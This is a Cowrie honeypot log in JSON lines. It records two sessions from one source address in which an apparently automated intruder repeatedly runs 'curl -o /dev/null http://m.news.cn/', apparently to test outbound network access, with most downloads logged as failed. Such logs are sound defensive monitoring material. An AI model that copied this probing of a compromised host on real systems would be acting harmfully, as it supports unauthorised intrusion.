{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.078839Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.080472Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:59.110687Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.111788Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:59.114092Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.114948Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.141212Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:59.167982Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.169062Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:59.176244Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.177175Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.195205Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.197012Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:59.226190Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.227432Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:59.235900Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.236975Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.250389Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.251944Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:59.287185Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.288654Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:59.295883Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.296866Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.311316Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:59.341470Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.342505Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:59.352224Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.353296Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.362025Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.363370Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:59.389949Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.391249Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:59.405388Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.406615Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.408710Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.424089Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:59.440181Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.441106Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.447557Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:59.459744Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.460467Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:59.484670Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.485671Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:59.510219Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.511209Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:59.531103Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.532025Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.533454Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.535267Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.578460Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:59.580986Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.582130Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:59.603622Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.604647Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.618190Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:59.636891Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.637884Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:59.660743Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.661727Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:59.698276Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.699264Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:59.721289Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.722323Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:59.772397Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.773593Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:59.817150Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.818120Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.851728Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.853391Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:59.859764Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.860853Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.875996Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.905141Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.906732Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.981970Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:59.983835Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.049854Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.050881Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.068216Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.069289Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.073180Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.074484Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.096636Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.097943Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.111170Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.112318Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.143782Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.144987Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.159725Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.160727Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.185169Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.186275Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.203100Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.204114Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.223195Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.224335Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.244836Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.245858Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.261782Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.262839Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.285119Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.286115Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.287791Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.289848Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.301854Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.302902Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.332647Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.333849Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.343795Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.346559Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.347668Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.379758Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.382267Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.383496Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.386681Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.393164Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.394234Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.430443Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.431716Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:00.436312Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.437261Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.477425Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.479707Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.532945Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.534272Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:00.563344Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
